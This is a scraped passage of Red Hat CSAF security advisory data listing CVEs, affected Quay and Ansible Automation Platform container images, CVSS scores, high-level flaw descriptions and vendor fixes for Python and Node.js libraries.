"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "pyasn1: pyasn1 Vulnerable to Denial of Service via Unbounded Recursion"
},
{
"cve": "CVE-2026-32597",
"cwe": {
"id": "CWE-347",
"name": "Improper Verification of Cryptographic Signature"
},
"discovery_date": "2026-03-12T22:01:29.967713+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2447194"
}
],
"notes": [
{
"category": "description",
"text": "A missing verification step has been discovered in PyJWT. PyJWT does not validate the crit (Critical) Header Parameter defined in RFC 7515 \u00a74.1.11. When a JWS token contains a crit array listing extensions that PyJWT does not understand, the library accepts the token instead of rejecting it. This violates the MUST requirement in the RFC.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pyjwt: PyJWT accepts unknown `crit` header extensions (RFC 7515 \u00a74.1.11 MUST violation)",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-32597"
},
{
"category": "external",
"summary": "RHBZ#2447194",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447194"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-32597",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32597"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32597",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32597"
},
{
"category": "external",
"summary": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-752w-5fwx-jx9f",
"url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-752w-5fwx-jx9f"
}
],
"release_date": "2026-03-12T21:41:50.427000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T22:07:28+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6568"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "pyjwt: PyJWT accepts unknown `crit` header extensions (RFC 7515 \u00a74.1.11 MUST violation)"
}
]
}
RHSA-2026:6309
Vulnerability from csaf_redhat - Published: 2026-03-31 23:31 - Updated: 2026-04-16 10:45A decompression based denial of service flaw has been discovered in the AIOHTTP python library. Library versions 3.13.2 and below allow a zip bomb to be used to execute a DoS against the AIOHTTP server. An attacker may be able to send a compressed request that when decompressed by AIOHTTP could exhaust the host's memory.
A flaw was found in ajv. When the $data option is enabled, the value of the pattern keyword is passed directly to the JavaScript RegExp() constructor without sufficient validation. An attacker able to supply a malicious regular expression pattern can trigger a ReDoS (Regular Expression Denial of Service), causing the application to become unresponsive and resulting in a denial of service.
A flaw was found in the jsonpath component. This vulnerability allows a remote attacker to achieve arbitrary code execution by supplying a malicious JSON Path expression. The component's reliance on the `static-eval` module for processing user-supplied input leads to unsafe evaluation. Successful exploitation can result in Remote Code Execution (RCE) in Node.js environments or Cross-site Scripting (XSS) in browser contexts.
A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
A flaw was found the Pillow Python imaging library. Providing a specially crafted PSD image may lead to an out-of-bounds write. This could potentially allow for arbitrary code execution or information disclosure.
A validation flaw has been discovered in the python cryptography package. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks information about victim_private_key mod (small_subgroup_order). For curves with cofactor > 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it's easy to forge signatures on the small subgroup. Only SECT curves are impacted by this.
A flaw was found in Authlib, a Python library used for building OAuth and OpenID Connect (OIDC) servers. This vulnerability allows a remote attacker to bypass critical integrity checks in OIDC ID Tokens. Specifically, the library's internal hash verification logic fails open when encountering an unsupported cryptographic algorithm, accepting a forged ID Token as valid. This can lead to an authentication bypass, granting unauthorized access to systems relying on Authlib for OIDC authentication.
A flaw was found in Authlib, a Python library for building OAuth and OpenID Connect servers. A remote attacker can exploit this vulnerability by crafting a malicious JSON Web Token (JWT) with a "none" algorithm and an empty signature. This bypasses the expected signature verification, potentially allowing the attacker to forge tokens and gain unauthorized access or perform unauthorized actions within applications using Authlib.
A flaw was found in SVGO, an SVG (Scalable Vector Graphics) Optimizer. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by submitting a specially crafted XML file. The application's failure to properly guard against XML entity expansion or recursion can lead to the Node.js process consuming excessive memory and crashing.
A flaw was found in express-rate-limit. The default key generator incorrectly applies IPv6 subnet masking to IPv4-mapped IPv6 addresses, which are used when an IPv4 client connects to a dual-stack server. This misconfiguration causes all IPv4 traffic to be treated as a single entity for rate limiting. Consequently, a remote attacker can exhaust the rate limit with a single client, leading to a Denial of Service (DoS) for all other IPv4 clients by causing them to receive HTTP 429 errors.
An unbounded recursion flaw has been discovered in the pypi pyasn1 library. This uncontrolled recursion occurs when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing nested SEQUENCE (0x30) or SET (0x31) tags with Indefinite Length (0x80) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a RecursionError or consumes all available memory (OOM), crashing the host application.
| URL | Category | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Red Hat Ansible Automation Platform 2.6",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language.\n\nFor details about this release, refer to the release notes listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:6309",
"url": "https://access.redhat.com/errata/RHSA-2026:6309"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26007",
"url": "https://access.redhat.com/security/cve/CVE-2026-26007"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-69223",
"url": "https://access.redhat.com/security/cve/CVE-2025-69223"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-69873",
"url": "https://access.redhat.com/security/cve/CVE-2025-69873"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-1615",
"url": "https://access.redhat.com/security/cve/CVE-2026-1615"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-28498",
"url": "https://access.redhat.com/security/cve/CVE-2026-28498"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-28802",
"url": "https://access.redhat.com/security/cve/CVE-2026-28802"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-29074",
"url": "https://access.redhat.com/security/cve/CVE-2026-29074"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-30827",
"url": "https://access.redhat.com/security/cve/CVE-2026-30827"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-30922",
"url": "https://access.redhat.com/security/cve/CVE-2026-30922"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25990",
"url": "https://access.redhat.com/security/cve/CVE-2026-25990"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6/html/release_notes/patch_releases",
"url": "https://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6/html/release_notes/patch_releases"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_6309.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Ansible Automation Platform 2.6 Container Release Update",
"tracking": {
"current_release_date": "2026-04-16T10:45:24+00:00",
"generator": {
"date": "2026-04-16T10:45:24+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:6309",
"initial_release_date": "2026-03-31T23:31:56+00:00",
